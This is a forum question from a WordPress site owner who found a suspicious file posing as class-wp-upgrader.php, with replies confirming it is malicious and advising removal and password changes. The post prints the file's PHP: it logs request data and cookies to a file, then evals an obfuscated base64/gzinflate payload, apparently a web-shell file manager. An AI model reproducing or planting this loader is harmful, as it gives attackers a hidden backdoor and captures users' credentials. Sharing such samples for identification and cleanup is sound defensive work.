# Found class-wp-upgrader.php in wp-include folder

Tags: php, wordpress, security

I found a file called class-wp-upgrader.php in wp-include containing some weird code:

```
<?php error_reporting(0); ob_start(); var_dump($_POST, $_GET, $_COOKIE, $_FILES); $output = ob_get_clean(); $fp = fopen('./error_log', 'a'); fwrite($fp, print_r($output, TRUE)); fclose($fp); ob_end_clean(); eval(gzinflate(base64_decode("1X39e9q40ujP3efZ/0H1yVnDlhAgTbcJJWm+Q5omachX0+RyjDHgYrDXhpC0p//7nRlJtvwBId3d9753z3MaLI1Go9HXaDQz2lh/t+H1vF9/Wfr9919/Yb+zq8YJq/BfVos1epbjsNYjc89amLj06y//WjDGo17TM4KA1Zj2ZtlY7ZQs449Wa/VtaaX0x+qb1pvXq9bblddvy29fr2jVX39ZMF3H9RH6X+0OT2lbHWPsjJqGObLdIWTpe7ZjBR+NoQ7Z7yHbHlo5vbF7tNc83Tw/0Aus2dyrH+02m3kAwP/ZnRwLRr7nBrmFZmP37HL37It+cH5+2ryAr+bm/u7xuX5X0Pddt+tYep69rNVYx3ACi+XZ919/edGzjLbl56jMUrlYYq9Lr9mxO2J[...]ZBlj99ZeN9f8L")));
```

is it a virus ?

Comment: yes. it is some malicious script trying to do some nasty things.

Comment: thanks for reply , i found out this something like a hole site manager file, 
this script do all operations edit , update , delete , chmod ...

Answer (score 2, accepted):

Whatever that is, it is **not part of default Wordpress code**.

You should **remove that file**, change passwords for all users in your Wordpress installation as well as database and inspect your website for possible entry point. If you haven't already, upgrade Wordpress to newest version.